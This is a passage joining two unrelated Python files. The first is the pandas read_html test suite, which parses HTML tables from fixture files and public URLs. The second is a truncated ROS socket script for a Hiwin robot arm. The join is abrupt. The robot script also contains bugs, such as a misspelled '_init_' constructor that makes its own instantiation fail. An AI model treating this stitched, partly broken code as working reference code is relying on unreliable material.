from pandas import DataFrame, Index, MultiIndex, Series, Timestamp, date_range, read_csv
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
"len(list1) == {0}, "
"len(list2) == {1}".format(len(list1), len(list2))
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, "google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=td.skip_if_no("bs4")),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{0:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@tm.network
def test_banklist_url(self):
url = "http://www.fdic.gov/bank/individual/failed/banklist.html"
df1 = self.read_html(
url, "First Federal Bank of Florida", attrs={"id": "table"}
)
df2 = self.read_html(url, "Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, ".*Water.*")
df2 = self.read_html(url, "Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(self.banklist_data, ".*Florida.*", attrs={"id": "table"})
df2 = self.read_html(self.banklist_data, "Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, ".*Water.*")
df2 = self.read_html(self.spam_data, "Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, ".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, "Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=range(2))[0]
df2 = self.read_html(self.spam_data, "Unit", skiprows=range(2))[0]
tm.assert_frame_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, "Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, "Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, "Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, "Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, "Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, "Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, ".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, ".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, "Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, ".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, "Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, ".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, "Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, ".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, "Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, ".*Water.*")
df2 = self.read_html(data2, "Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, ".*Water.*")
df2 = self.read_html(data, "Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, ".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, "Unit")
assert_framelist_equal(df1, df2)
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html("git://github.com", match=".*Water.*")
@tm.network
@pytest.mark.slow
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
except ValueError as e:
assert "No tables found" in str(e)
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), "First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, "First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, "Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, "Water", skiprows=-1)
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
@pytest.mark.slow
def test_thousands_macau_stats(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "html", "macau.html")
dfs = self.read_html(macau_data, index_col=0, attrs={"class": "style1"})
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.items())
@pytest.mark.slow
def test_thousands_macau_index_col(self, datapath, request):
# https://github.com/pandas-dev/pandas/issues/29622
# This tests fails for bs4 >= 4.8.0 - so handle xfail accordingly
if self.read_html.keywords.get("flavor") == "bs4" and td.safe_import(
"bs4", "4.8.0"
):
reason = "fails for bs4 version >= 4.8.0"
request.node.add_marker(pytest.mark.xfail(reason=reason))
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "html", "macau.html")
dfs = self.read_html(macau_data, index_col=0, header=0)
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.items())
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
def test_nyse_wsj_commas_table(self, datapath):
data = datapath("io", "data", "html", "nyse_wsj.html")
df = self.read_html(data, index_col=0, header=0, attrs={"class": "mdcTable"})[0]
expected = Index(
[
"Issue(Roll over for charts and headlines)",
"Volume",
"Price",
"Chg",
"% Chg",
]
)
nrows = 100
assert df.shape[0] == nrows
tm.assert_index_equal(df.columns, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, "Metcalf", attrs={"id": "table"})[0]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols]._convert(datetime=True, coerce=True)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data, "r") as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(self.banklist_data, "Gold Canyon", attrs={"id": "table"})[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_computer_sales_page(self, datapath):
data = datapath("io", "data", "html", "computer_sales_page.html")
msg = (
r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns"
)
with pytest.raises(ParserError, match=msg):
self.read_html(data, header=[0, 1])
data = datapath("io", "data", "html", "computer_sales_page.html")
assert self.read_html(data, header=[1, 2])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, "Arizona", header=1)[0]
assert result["sq mi"].dtype == np.dtype("float64")
def test_parser_error_on_empty_header_row(self):
msg = (
r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns"
)
with pytest.raises(ParserError, match=msg):
self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, ".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
|
Hiwin_RT605_ArmCommand_Socket_20190627164529.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def _init_(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(False,False)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
while not rospy.is_shutdown():
